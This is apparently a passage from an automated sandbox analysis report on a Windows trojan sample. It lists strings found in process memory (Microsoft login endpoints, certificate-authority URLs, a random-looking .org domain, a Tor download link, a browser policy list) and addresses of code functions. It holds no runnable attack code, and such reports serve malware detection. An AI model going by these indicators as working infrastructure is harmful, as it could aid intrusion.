Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977227438.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000001D.00000002.23220023205.000002C168260000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977227438.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 0000001D.00000003.21977118694.000002C168D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977351770.000002C168D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srfe.com
Source: svchost.exe, 0000001D.00000003.21977118694.000002C168D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23220023205.000002C168260000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977227438.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977351770.000002C168D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 0000001D.00000002.23220023205.000002C168260000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221293391.000002C168D13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/geter
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfer
Source: svchost.exe, 0000001D.00000003.21977501299.000002C168D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000001D.00000003.21977118694.000002C168D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23220023205.000002C168260000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977351770.000002C168D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000001D.00000002.23221786081.000002C168D6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977501299.000002C168D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfnfig.xml
Source: svchost.exe, 0000001D.00000003.21977501299.000002C168D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000001D.00000003.21977118694.000002C168D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23220023205.000002C168260000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977227438.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977351770.000002C168D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cplive.com
Source: svchost.exe, 0000001D.00000003.21977501299.000002C168D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 0000001D.00000003.21977501299.000002C168D6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfssuer
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 0000001D.00000002.23221786081.000002C168D6D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977501299.000002C168D6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfn
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502Issuer
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000001D.00000003.21977118694.000002C168D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23220023205.000002C168260000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977351770.000002C168D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000001D.00000003.21977118694.000002C168D3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977351770.000002C168D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000001D.00000002.23220023205.000002C168260000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf#h
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000001D.00000002.23219682115.000002C16822A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/lip
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000001D.00000003.21976982682.000002C168D4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srfrf
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: CasPol.exe, 00000005.00000002.23245577235.000000001D986000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://owWZDyjXwQrXMrJH.or
Source: CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23246237802.000000001D9BE000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://owWZDyjXwQrXMrJH.org
Source: CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://owWZDyjXwQrXMrJH.org8?
Source: CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://owWZDyjXwQrXMrJH.orgt-
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repository.luxtrust.lu0
Source: svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: NisSrv.exe.16.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
Source: NisSrv.exe.16.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m

Source: CasPol.exe, 00000005.00000002.23245153177.000000001D935000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe

Code function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_004056DE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_0040755C	1_2_0040755C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_00406D85	1_2_00406D85
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_6F3D1BFF	1_2_6F3D1BFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A24745	1_2_02A24745
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A106AA	1_2_02A106AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A116AF	1_2_02A116AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A102B7	1_2_02A102B7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C2BD	1_2_02A1C2BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11A89	1_2_02A11A89
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10A90	1_2_02A10A90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A116E8	1_2_02A116E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10EE8	1_2_02A10EE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A102EE	1_2_02A102EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10AC6	1_2_02A10AC6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11AD0	1_2_02A11AD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C2DF	1_2_02A1C2DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1BE2F	1_2_02A1BE2F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10A32	1_2_02A10A32
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1023D	1_2_02A1023D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1063E	1_2_02A1063E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11671	1_2_02A11671
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10671	1_2_02A10671
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10E73	1_2_02A10E73
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1167F	1_2_02A1167F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1027E	1_2_02A1027E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A16E42	1_2_02A16E42
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1724E	1_2_02A1724E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11651	1_2_02A11651
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10A53	1_2_02A10A53
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A187AF	1_2_02A187AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10BB4	1_2_02A10BB4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1C387	1_2_02A1C387
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11B8B	1_2_02A11B8B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A1038F	1_2_02A1038F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A10F97	1_2_02A10F97
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A11796	1_2_02A11796
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A257E5	1_2_02A257E5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	Code function: 1_2_02A107EA	1_2_02A107EA
